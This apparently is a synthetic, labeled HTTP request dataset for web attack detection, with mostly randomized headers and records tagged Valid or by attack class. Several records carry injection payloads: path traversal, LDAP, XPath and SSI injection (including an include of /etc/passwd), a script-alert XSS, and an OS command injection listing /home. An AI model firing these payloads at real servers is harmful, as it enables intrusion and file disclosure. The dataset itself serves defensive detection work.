Cache-Control: min-fresh=8
Client-ip: 127.204.91.129
Cookie: Ld=dLS_Jw;urnKsdKhaeynes=aGd@ioC@;5sice8=14206613;eherziieacuK=edr;sgse9=o;gdattYp=e7mQ2J1
Cookie2: $Version="2"
Date: Fri, 14 Aug 09 11:07:13 CET
ETag: "Lgka-Qg8YEq22Z3L"
Expect: 100-continue
From: tir8j@ttaaerhreh.com
If-Modified-Since: Fri, 20 Nov 09 08:48:18 UTC
If-Unmodified-Since: Wed, 02 Sep 09 07:13:06 CET
If-Match: "X.Q7ySw@0_vTbJX"
If-None-Match: *
If-Range: *
Max-Forwards: 0033
MIME-Version: 7.8
Pragma: o=Tw6
Proxy-Authorization: Digest nc=6CeB3cE8
Authorization: tlgetT e8ulbh=RasT
Range: -630,9-,363-
Referer: /r5raH1k/dbbeRt.jpeg
TE: trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.4 (X11; U; Open BSD i586 7.1; kw-ah; rv:1.9.5) Gecko/41437915
UA-CPU: MIPS
UA-Disp: 318,100,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 265x821
Via: 3.3 9.63.20.40:5, HTTP/5.6 200.7.184.148, 6.0 www.Uhenii.jpeg
Transfer-Encoding: deflate
Upgrade: IDh/1.5, et4A/0.8, doooen/6.2
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 157.1.233.188
X-Serial-Number: 6066558353005235
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15849
Start - Id: 45562
class: PathTransversal
GET /nhxakph18nzoallagsi.png?ao2yd9nkrsohhh1=e%3A%5Cautoexec.bat&H2linkmail45QN7=677&nameehet=6428223&Neiru=ieX&zFF0Nznode9=niw6f2p HTTP/1.1
Host: www.fLTigwnTa.uk
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-8;q=0.0, cp-932
Accept-Encoding: compress, deflate, identity, gzip;q=0.4
Accept-Language: tWyzH-saxwe, nf-jeot
Cache-Control: no-cache
Client-ip: 164.135.230.128
Cookie: -wgetuY2AsyN=j >((yh7shnwe;4ZZIoptBl7=ecdresinsertda9s|;jtjodU=]tecsnbm;sndaet3arTSEuJ=3;wmlstgtrdit=sXm84z;nnw6puA=83575925
Cookie2: $Version="73"
Date: Sun, 17 Apr 05 05:54:52 CET
ETag: "Qlz3rPdG2rpqtnpu"
Expect: 100-continue
From: kccnlkv2@rodignu.de
If-Modified-Since: Fri, 28 May 04 19:58:07 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: *
If-None-Match: "1-eM-vC.MigzzBmh"
If-Range: "Z@A5VKN5TR3g4pnbYeNg"
Max-Forwards: 332
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: 0391-
Referer: http://www.sspll.gov/0t4ir1oh/eldnPn/ohae/dhiyie.wav
TE: deflate,gzip;q=0.2,gzip;q=0.7
Trailer: If-Unmodified-Since
User-Agent: fnuaelhiep4ntn0
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 5.6 20.210.5.114
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45562
Start - Id: 12490
class: Valid
GET /8cvo/dklyZFLwN4/kWw/e./BhtpassAN/5asMH2/nserviceshtaccesXBPF40/iefsstoi/where7BlqIJX6Gjd-/wiahbaehmeeea3rr/kP/oLbpQ@.mspx?7nxdha7o=329&idazegb=eURN&Li65Bp=522641469&sebenrnsoDa=hdiD84&tad=hFTu&jerlnmafeait=tU1&se=25803&nieku=11069&7wryope=h%24 HTTP/1.1
Host: www.init.cz
Connection: close
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: *
Accept-Language: sedb-ieOsac;q=0.8, w-cxiu
Cache-Control: no-transform
Client-ip: 29.146.35.8
Cookie: sei=xp_tpasswd|uylvuca;fc$;J7systemxMQQtmpL=evsithrcpo;tEawwcCS=d=;Tcsney8dwotiv=esOh;FU3KVi@Mq=hZ1twr
Cookie2: $Version="030"
Date: Sun, 13 Apr 08 12:14:39 UTC
ETag: W/"PKEMb.yU@ADInpq-G4"
Expect: 100-continue
From: onmipQs@glnUodo.be
If-Modified-Since: Wed, 01 Jul 09 12:18:03 UTC
If-Unmodified-Since: Sun, 21 May 06 12:44:26 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 08
MIME-Version: 3.0
Pragma: br4dyg=drgtrd
Proxy-Authorization: NTLM bkF5bjZkZjVtY3JhNjRsdGd0b2E0bmRUaXRodG9pMGR0
Authorization: NTLM ZWVlZWVsc1RyN290ZUVkdmxlb05oc295YVNsbnRoMnJvVGNheHZFb2lodnN0c21h
Range: -4939,-866,-848
Referer: http://www.kIdhn.uk/mialwegt.shtml
TE: trailers,trailers,gzip
Trailer: Upgrade
User-Agent: e1dq7r6 http://www.peahaaa.de
UA-CPU: MIPS
UA-Disp: 1381,400,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 730x939
Via: 9.1 150.246.29.9, FTP/8.8 31.245.212.171, intos/6.5 17.40.81.161
Transfer-Encoding: deflate
Upgrade: fetcan/0.3, ayo/7.4, eatfnr/1.3, gutm/1.1
Warning: 997 139.90.117.24 "bnqtnmr9rievi" 
X-Forwarded-For: 145.136.143.164
X-Serial-Number: 12693
----: -------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 12490
Start - Id: 33770
class: Valid
PUT /iBP2K/pP/adminRPeval@Lt3/tis/wi7elktlAteXvyeteaaT/zj1aODWNdKAriYgS/feai4as7ueah/rY6pUXJEThVHD4_z/hqnPeegi8f/wuaH.mspx? HTTP/1.0
Content-Length: 72
Content-Language: 8aHy
Content-Encoding: gzip
Content-Location: http://dJmibr.cz/diec.txt
Content-MD5: bzNkMXRlc09lUGRvcGF1ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 17 Aug 08 07:11:38 UTC
Last-Modified: Wed, 15 Oct 08 16:34:00 UTC
Host: 20.243.246.123
Connection: keep-alive
Accept: text/plain, application/rtf
Accept-Charset: *;q=0.8
Accept-Encoding: identity, compress;q=0.3, compress;q=0.8, compress;q=0.7
Accept-Language: m-nNhsRu;q=0.4, seau-tfa, 2eC-th6;q=0.6, 2ujg7ATT-ao
Cache-Control: min-fresh=94876
Client-ip: 90.192.24.240
Cookie: agI2oot=nr5
Cookie2: $Version="5"
Date: Thu, 05 Mar 09 02:09:35 UTC
ETag: W/"pO_@8EIcLHeEwG5"
Expect: eeSe8e
From: padevrt@aioitadl.de
If-Modified-Since: Sun, 01 Feb 09 13:37:06 UTC
If-Unmodified-Since: Wed, 06 Sep 06 05:13:35 UTC
If-Match: "J5LVdYqd0Gu1kIlGmK"
If-None-Match: "lIbaxcMsPXpFGwPU_9uk"
If-Range: "faHUQpz-PuotH@Y"
Max-Forwards: 91
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: NTLM b2V0c2Fkd2UxZWJuZXc4dHRyeTBsaVJlb2xzYjZ0dHNzb2duVnJhdGhM
Authorization: NTLM cjVpOWNFbW5pemxuMHJuSWZ0ZWdlYXQxaW9jeHRpZ2lod2Vhb3M5d2NiTQ==
Range: 26855-,847-,-23
Referer: /resa/Heo0wa.jpg
TE: trailers,gzip;q=0.9
Trailer: Accept
User-Agent: Mozilla/1.2 (X11; U; Open BSD i586 3.4; r0-at; rv:7.9.0) Gecko/69669867
UA-CPU: StrongARM
UA-Disp: 2862,4299,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 402x308
Via: 8.8 www.libptni.htm, 0.3 www.hhvs.png:77709
Transfer-Encoding: identity
Upgrade: afdtp/0.2, msesl/6.4
Warning: 813 217.129.214.222 "datp" 
X-Forwarded-For: 51.229.157.116
X-Serial-Number: 425658
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

bscHfleeron=hwv&hIe6gn4ER=946&H2N@= rc&WS4rscswgistei=016&ew8=aiojduEfio

End - Id: 33770
Start - Id: 1101
class: Valid
GET /2KQuKd_J5lGqoU4M0H/0P4Kxb/nnrFs1/lX@_D_rLusjUsq5BOC/QsethlA/1K/8cN.jsp?N0_Tawmvcomail=nesm&oocN2=9476&bisSW=adMwGqq&ntjrsrige=a8ateccc&hnhtrig=3&eeXeadeo=y8rGk%27idocumenthIcmimgere&mmmsa9i2w9n=735886&abdprrrritbdw=ogagsge6beee6tto&hei=oXbErl0C&eeo6u3USwtttrl8=a7beshutdownsttb7body&iseAee=tzM2vdjyHw&Ateb2uhieae=oieytrtmp9nh&biO8a8Q28w=2766334&2vSI07h=kedpgsstiw0lrnmetaAte HTTP/1.0
Host: 119.174.193.148
Connection: close
Accept: */*
Accept-Charset: cp-950;q=0.8
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=1
Client-ip: 249.26.84.16
Cookie: wbnasntrRro=0;Deb=48968395;fireajthhtIg=DorA;s3koatehoU=47034;tmttfld7a=7znuy7aN1Deaaei
Cookie2: $Version="48"
Date: Mon, 15 May 06 09:52:59 CET
ETag: W/"CLMnrtpnGcA_ZQp"
Expect: 100-continue
From: hsrtboi@onni.cz
If-Modified-Since: Sun, 24 Jul 05 20:42:46 CET
If-Unmodified-Since: Mon, 15 Oct 07 07:05:34 GMT
If-Match: "aDcV4HzyhcFyo9g1"
If-None-Match: *
If-Range: *
Max-Forwards: 42
MIME-Version: 9.9
Pragma: o=r
Proxy-Authorization: NTLM b3N4Z2dodHNhcnl5ZWhmcmZvMWd5cnhybm50ZmhyYWVlYm5hN3RvdG5jcw==
Authorization: Digest username="esc6"
Range: 634551-,48052-6687,-9
Referer: http://www.0skesns.org/tgrddd6o/ngy9Teet/leoiIna/cdeem7m/wheFi.avi
TE: trailers,gzip;q=0.4,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.7 (Windows; U; Win98 6.9; 1m-tm; rv:8.4.3) Gecko/60800293
UA-CPU: StrongARM
UA-Disp: 4228,5087,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 8837x3320
Via: 0.8 www.arowo.htm, 2.9 www.dume.js, 9.4 www.trp9esd.shtml
Transfer-Encoding: deflate
Upgrade: naoiE7/1.4, Zee1m6/8.6, 40Hci1/1.3, 6iCotl/8.9
Warning: 392 www.m2hZnz.tiff "idliSa9nioaswwetlp" "Thu, 02 Sep 04 23:56:20 CET"
X-Forwarded-For: 202.230.15.64
X-Serial-Number: 627934
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1101
Start - Id: 16393
class: Valid
GET /1T.V.OYGC3U.Jf_BKz/tN8IkmIvD9ve/Lsriqmnah4aersNTdy/UL/wvFJb2qzjpSzJ5qq.jsp?oEl7X7P=892&Eimk50yzoCt6f=628839&mxM864Y6F2=i%28+efusrhT&abnutrglide4uwa=lus&yeinr=iga&Dtl6=736874&rn8s=02319&inneope=6887&geajdo=8&itiest=7525&4totRwT=99692413&sChyhoI=eHpeaygle0te&roih=decmueY+ted HTTP/1.0
Host: 177.74.3.152:80
Connection: tdNs
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.2, compress, gzip;q=0.6, deflate, compress
Accept-Language: 8x-NSifeo, etvrtsg-i5iEhisr, e1-aRira;q=0.7, Sehh-je;q=0.0, GL-sEldzo
Cache-Control: min-fresh=269
Client-ip: 47.227.109.121
Cookie: aahklwotila=Om;ldiitrstdweo=xjwhn]bou;hrnrsYu=f;r;ku8ht4Imadte=i/ 5n;rpo0n=gdneloeypl1fLn;lw8anonAi=cnatieP
Cookie2: $Version="194"
Date: Tue, 21 Apr 09 16:14:56 CET
ETag: W/"iU@OCIQz7G.@o5g"
Expect: diNw=dn6cehe;gfebi=Tapjtbs
From: piRire@gfja0tm2d.be
If-Modified-Since: Mon, 23 Jul 07 21:20:53 CET
If-Unmodified-Since: Thu, 07 Jan 10 12:26:05 GMT
If-Match: *
If-None-Match: "5Pel7WQh5J8aKs@H@"
If-Range: *
Max-Forwards: 607
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: Digest opaque="e9apj"
Authorization: Digest qop=heton
Range: 01-1534,0-2392,77-9065
Referer: http://rnkxt.net/ghxOtPen/tCep/t0ouoeA/ermnEot/0raotu7h.swf
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/5.1 (Windows; U; WinNT 8.6; pe-5A; rv:1.0.3) Gecko/98689077
UA-CPU: MIPS
UA-Disp: 227,815,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 9846x663
Via: FTP/8.4 www.2nsngnti.htm, HTTP/8.2 www.tees.tiff
Transfer-Encoding: deflate
Upgrade: Or46/0.2, nsn/5.8, nEiiOe/8.0, Tldds/1.2
Warning: 078 www.eswsl.htm "tepecba9N2eeroese" 
X-Forwarded-For: 35.90.162.224
X-Serial-Number: 5481271353118244328
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16393
Start - Id: 37908
class: LdapInjection
GET /i9jNshOr/Jp/dS/stTe.pl?teriteuu=ahinputl+4tfad%2Breieiu&DcusiEthsseESln=%29++%28+++%7C%28++++cn%3D*o+++%27brien*%29%28mail++++%3D*o+++%27brien*++++%29++&lrpbN=dr0JeU-Qpp&7lfh=4semsystem0sd%25uuometaniin HTTP/1.1
Host: 133.144.164.94
Connection: er9gtg
Accept: audio/x-wav;q=0.5, audio/x-wav, image/*;q=0.9
Accept-Charset: shift_jis
Accept-Encoding: *
Accept-Language: igEmefr-38zetez;q=0.3, 8ac-at
Cache-Control: only-if-cached
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="4"
Date: Thu, 27 Aug 09 01:52:25 UTC
ETag: "JZhlDTWGKEbF0bqOW33"
Expect: 100-continue
From: ricsu5la@emarau.st
If-Modified-Since: Thu, 01 Sep 05 04:01:17 UTC
If-Unmodified-Since: Thu, 25 Oct 07 16:53:49 CET
If-Match: *
If-None-Match: "8IK.voC9jG9gVtq"
If-Range: Wed, 28 Feb 07 05:55:11 CET
Max-Forwards: 999
MIME-Version: 7.8
Pragma: 0KeaihmT='t9aart'
Proxy-Authorization: fnitn eCTeeuhe=Ltdusgh
Authorization: Basic aG5pNEg6dG1pYmlleA==
Range: -004662,03-,-2001
Referer: http://www.Ane1do.cz/utsa0/zPsc/ygvHooa.php
TE: trailers,trailers
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Machintosh; U; PPC Mac OS X 6.7; w4-sR; rv:7.3.7) Gecko/63551239
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: FTP/5.7 172.19.228.35, 6.9 138.132.10.211
Transfer-Encoding: compress
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 17792276895005878262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37908
Start - Id: 2297
class: Valid
GET /9-aJh/emNU4GhPMkB0T4xmx/e2tuIPRuZ8PiPdn2Myfv/9tHjrhhmmi8oobi/akJoj5J.gif?hdiic=271577&objectEf-o=ena&9soitshhpc2a=elt HTTP/1.0
Host: 50.234.193.86
Connection: close
Accept: audio/basic;q=0.6, video/*, video/*
Accept-Charset: iso-8859-7, windows-1253;q=0.0
Accept-Encoding: deflate;q=0.3
Accept-Language: t-d0OHr;q=0.9, tvac8-o2cessA;q=0.0, 1oo-N;q=0.5
Cache-Control: e=iu2aa9d
Client-ip: 188.126.3.150
Cookie: 6Uiframeklinke.-=rr rmpbxmlCrwp-;U6sksils=$ti4owaer ulUt;bqsiot3nArep9iU=~ermae>ha
Cookie2: $Version="8"
Date: Mon, 04 Jun 07 13:47:33 UTC
ETag: W/"Qvc8zG9Fbwu9zTWPjKp"
Expect: 100-continue
From: Epwt@mIbard.com
If-Modified-Since: Tue, 30 Jun 09 20:50:07 CET
If-Unmodified-Since: Sun, 11 Jul 04 11:13:49 CET
If-Match: *
If-None-Match: "hPV1qoCRFqJ7e5p"
If-Range: *
Max-Forwards: 8
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: NTLM OHdjc2xva2VhcmVzZXNsMTNhc2FlM2x1Y2FyM2hhZXJjMlBl
Authorization: mieIN frf5oprp=1rjel
Range: -84,1854-0094,24267-16724
Referer: /annra/eeuanE/EesFfm/gLuarpr/osia.pl
TE: chunked;q=0.6,trailers,trailers
Trailer: Accept
User-Agent: Mozilla/5.1 (X11; U; Linux i386 6.8; an-rg; rv:0.2.8) Gecko/60709657
UA-CPU: 68000
UA-Disp: 359,305,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6264x742
Via: hdai2i/2.1 www.uwss.jpeg, 2.6 39.228.135.38, 9.7 137.111.131.188
Transfer-Encoding: vTiuc
Upgrade: genlR/0.3, rbx/3.6, eue/8.6, et6E6/2.3
Warning: 499 www.pnir9pr.htm "tr45ntaeteaI" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2297
Start - Id: 40807
class: SSI
GET /3SeegadirgadOhztn5x/4e_eiRE@zV_y-@/GeedetCecuetk/rsod0cxBUwnsac8Ap/J87G..js?J.Y@8G@X0s=%3C%21--+%23odbc++++connect%3D%22agss%2Cear3aE%2CsTt%22+++++statement%3D%22select++*+++from+msca%22--%3E&XMMn7qnusWanph-=828841&tis=sheieatrpiei HTTP/1.1
Host: www.edcG6lt.cz
Connection: heneitve
Accept: */*
Accept-Charset: iso-8859-6, euc-kr
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 34.137.144.86
Cookie: eiEk=hO;hsibilirIa=6A3KO;ictwuy7aluzd=6243059;ka2twueaorai=d0/hhRsjg$\;isu3tehetNLn=6;ci4=aBrsaeii
Cookie2: $Version="313"
Date: Sat, 01 Jul 06 11:32:55 UTC
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: snetell=1iri3waa
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 04 Jun 09 06:55:00 UTC
If-Unmodified-Since: Fri, 15 Sep 06 11:09:36 CET
If-Match: "SnWfAvpwjBHRiWG"
If-None-Match: *
If-Range: *
Max-Forwards: 7014
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest opaque="9des"
Authorization: Digest response="f1ee77A29BFA14Ce8efc10A3d53C9Ef5"
Range: 89010-,593978-8589,-17027
Referer: /46ni/odif3o.asp
TE: trailers,trailers,gzip
Trailer: Range
User-Agent: Mozilla/8.0 (X11; U; Linux i586 9.1; ae-nb; rv:9.5.5) Gecko/15403248
UA-CPU: 68000
UA-Disp: 327,318,8
UA-OS: Win98
UA-Pixels: 871x928
Via: 3.1 163.229.123.125:39629, 9.3 188.171.226.164, FTP/0.3 www.ds4e9ag.shtml
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: ala/0.5, s8eb/5.2, enTr/5.0, 7nub/8.8
Warning: 985 www.atEa.jpg:824 "esoj" "Tue, 11 Nov 08 09:01:56 UTC"
X-Serial-Number: 17196143235816087076
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40807
Start - Id: 49888
class: XPathInjection
GET /ih/otaswtrrinOw/elm5RrFN4J4J3Vu0fTuk/de0o/nov-2_Mdxh/7m9i-lCAzJgkCQj.php3?esl6ejlur=nzMdjtq%27+or+++++aad%2FSomc%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D9%5D++++or+++%27d7zt%27++++%3D++%27&ieaNtfklo=2049&.hgroup byxp_TU=jP1J&lBNC_M-uT=42571686 HTTP/1.1
Host: www.dtog.ch
Connection: Ms3nwqt
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=65
Client-ip: 192.165.249.59
Cookie: x1bmauUisIFY=HiaYi3uEis;wRWB=17;lt=nculhS;lIzekroshoviln=ntsgxmlNeid>p2
Cookie2: $Version="614"
Date: Sat, 06 Oct 07 23:35:50 UTC
ETag: W/"79-wqobJXvLTgCDO1"
Expect: 3ms1era
From: ldlcym@E8Sinechia.ch
If-Modified-Since: Wed, 04 Mar 09 04:33:06 CET
If-Unmodified-Since: Sun, 08 Mar 09 04:38:33 CET
If-Match: "WotaI_7NSmjhHGH"
If-None-Match: "HImC579EhDlvpdI"
If-Range: Mon, 05 Apr 10 20:59:46 GMT
Max-Forwards: 3
MIME-Version: 6.4
Pragma: hetuH='8erunlvr'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: http://www.eTsp.biz/cedlx/oiheen/oeds.txt
TE: trailers
Trailer: Connection
User-Agent: e4xE/7.0
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 9591x1965
Via: 9.6 75.55.106.5, 9.4 www.16shdts7.jpg
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 607 www.ihTevse4.js "aiSomhTteeigt" 
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49888
Start - Id: 16475
class: Valid
GET /eeetnl.bin?O0=3fca9%3Diom4i HTTP/1.0
Host: www.haawlmsjfa.st:80
Connection: iw52
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: a49-Uacms, pse-1baeihv
Cache-Control: no-cache
Client-ip: 116.86.88.217
Cookie: Mem8se=em3eewmgformpa%ui :woptih;ti=jn;ocideeadTksaeus=tetc)ah;aetaaxnef= %sau\/is;ilvvancsi5=nytr;sp7emoguxeeu8=DszaUbesitip3
Cookie2: $Version="75"
Date: Sun, 03 Dec 06 16:16:19 UTC
ETag: W/"7ZIa@ypOpsN0Ej0_f"
Expect: ugbrs0=oL6tA;qooopA
From: enneeci@ehirrnmall.it
If-Modified-Since: Sun, 05 Nov 06 20:11:55 UTC
If-Unmodified-Since: Fri, 04 May 07 15:43:30 UTC
If-Match: *
If-None-Match: "5JNyOOXsSqIE1jrX5"
If-Range: "5oEp8CvexltzMBUhVu"
Max-Forwards: 1035
MIME-Version: 3.8
Pragma: arstduet='sU'
Proxy-Authorization: Basic ZTJkZW86OHNNZTBp
Authorization: NTLM ZDBldGFoYzlsdHRpZTlkaXRuc2d3cmVvemVockVxdEdn
Range: 367-465064
Referer: http://nbPuicoh.gov/uost/ald11vtk/teasiwi.wav
TE: trailers,deflate
Trailer: Warning
User-Agent: s7j3@e http://www.seht.org
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 714x1442
Via: i9xx1/1.1 157.143.164.62
Transfer-Encoding: gzip
Upgrade: ry7ni/4.7, twhs/6.6, tDt/4.9, jtn/8.9, roho/9.5
Warning: 543 www.tjetzkwe.png "ctadem" "Wed, 01 Aug 07 06:58:08 GMT"
X-Forwarded-For: 59.247.137.64
X-Serial-Number: 764868889317962495
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 16475
Start - Id: 35943
class: PathTransversal
GET /EOTkMUGKAD.tiff?ioapBw9=window.openwinntsa&lsdthaaen=78968539&qcNyce=e7+&mwrc=%3C%21--++%23include+++++virtual%3D%22%2Fetc%2Fpasswd%22++--%3E HTTP/1.1
Host: www.ititsI0ot.ch
Connection: nodrna
Accept: image/png, text/*;q=0.2
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.7
Accept-Language: lactiw-n6R7hNhr
Cache-Control: no-transform
Client-ip: 107.17.117.247
Cookie: tyrtZ65s=7;CRJJV42ig=ehem8sinsertxselect$h;sesu=19492;wa=Inhy  fu
Cookie2: $Version="19"
Date: Sat, 23 May 09 17:47:07 CET
ETag: W/"GoOFLib-BwoAkUjow"
Expect: tesEzam
From: niaeaa@eH6xdhht.com
If-Modified-Since: Sat, 15 Aug 09 20:37:58 UTC
If-Unmodified-Since: Fri, 16 Sep 05 06:30:43 GMT
If-Match: "0e_j1lrGtWMXy2JVYV1"
If-None-Match: *
If-Range: Fri, 16 Apr 10 02:42:46 UTC
Max-Forwards: 164
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest username="dIrvs"
Authorization: Digest algorithm=m2uoga
Range: -25,5895-
Referer: /c1ts/cuetrs/elel.txt
TE: trailers,trailers,gzip;q=0.5
Trailer: If-Range
User-Agent: fpDrQJ http://www.aetNnib.net
UA-CPU: 68000
UA-Disp: 684,759,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 926x3351
Via: 1.7 145.24.126.106
Transfer-Encoding: compress
Warning: 334 www.lstanho.png "Hdnhe0hyyoGe34osiao" "Mon, 03 Nov 08 14:09:43 CET"
X-Serial-Number: 2416806
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35943
Start - Id: 46524
class: XSS
GET cgiwrap/<SCRIPT>alert(document.domain)</SCRIPT>? HTTP/1.1
Host: www.cohrt.com:8
Connection: keep-alive
Accept: image/gif;q=0.5, audio/*;q=0.4, audio/*;q=0.8
Accept-Charset: iso-8859-4, utf-8;q=0.4, x-mac-arabic;q=0.4, koi8;q=0.8, iso-10646-ucs-2;q=0.7
Accept-Encoding: 
Accept-Language: 4b-kelunt;q=0.0
Cache-Control: no-transform
Client-ip: 246.28.222.74
Cookie: huhweeOdN0eD3=(-;ucvIuusuntUr3de=eTjgn1E;ce3i76ee=$|0ZbTn<EbeTfsf4d];ieeoo7gutctzwr=5737556496;JAUwgetechttpsJscriptXV0=tfrLhuas
Cookie2: $Version="92"
Date: Tue, 22 Sep 09 15:08:04 UTC
ETag: "aNVJT2lKpqFCO9DMA"
Expect: Sire7=hmiat
From: ns7rogjc@npah.it
If-Modified-Since: Mon, 24 Oct 05 14:44:18 GMT
If-Unmodified-Since: Thu, 11 Aug 05 14:03:30 GMT
If-Match: "wa6B8W4dHwr_V0Uo.1if"
If-None-Match: "pxj_m.gXQ6E2vKg"
If-Range: "39BfhVaP4oOWHRYG@"
Max-Forwards: 892
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic aG1hZWVwNzpZYXNvbzU3cg==
Authorization: Digest realm
Range: -97604
Referer: http://us4yxC.fr/oivau/eaMdogTg/1tfwxt/afshorla/enjiTr.exe
TE: chunked;q=0.5,gzip
Trailer: If-None-Match
User-Agent: elo8m5NeA (a1PX5LH.; meCK2YUH_9; lk1U.ay; rVhk9iZh1; vB9OeOve)
UA-CPU: x86
UA-Disp: 0683,5714,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/2.6 www.nRlS.tiff
Transfer-Encoding: eAvlf; uUsfohoh=ieei
Upgrade: lAi/5.0, Nac/9.0, NeseBu/6.1, 6tswwc/0.1, it7Ey/2.3
Warning: 034 www.etht.jpeg:884 "dpke7ieui1ew0" 
X-Serial-Number: 907134703793407479
----: ----------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 46524
Start - Id: 43104
class: OsCommanding
GET /HN5htpassQ6D2Z5c4_Vj/l2hgmilp5dFelqt2s/o0u0hav/ozTT/Otiiwl57wnnneeweT.css?ovdnuoDectt=atg4tscscoftelnet75++t+&rtWz=9&lpietnwneu=feNr3mtdhz&oOsetilz=arw&omwnee0rl1cfD=+oit&oe7eexdfa346t=ls+++++-las++%2Fhome%2F+++%7C&iiFt=0yt&iio6HhXhrgshosN=passthruru&xohnnaS=s%3Eeeehto&znaidtaweo6=8Ln%3C+ HTTP/1.0
Host: 213.182.52.217
Connection: close
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: compress
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 160.22.241.142
Cookie: oey3efl9rrsN=201
Cookie2: $Version="389"
Date: Wed, 13 May 09 02:40:40 CET
ETag: "_4qjG6.03WCUTMpx"
Expect: 100-continue
From: roneeua@1gSEvrlu.org
If-Modified-Since: Sat, 21 Mar 09 04:23:17 UTC
If-Unmodified-Since: Thu, 18 Mar 10 23:16:11 UTC
If-Match: *
If-None-Match: *
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 220
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Jwosfs mnR2=s6nera
Authorization: Digest uri=/T1ebtt.php
Referer: http://nttitiz.it/rgrHk/dtNrr4.jpg
TE: deflate
Trailer: Date
User-Agent: Mozilla/4.3 (Machintosh; U; PPC Mac OS X 5.8; 3d-sr; rv:7.7.8) Gecko/77909339
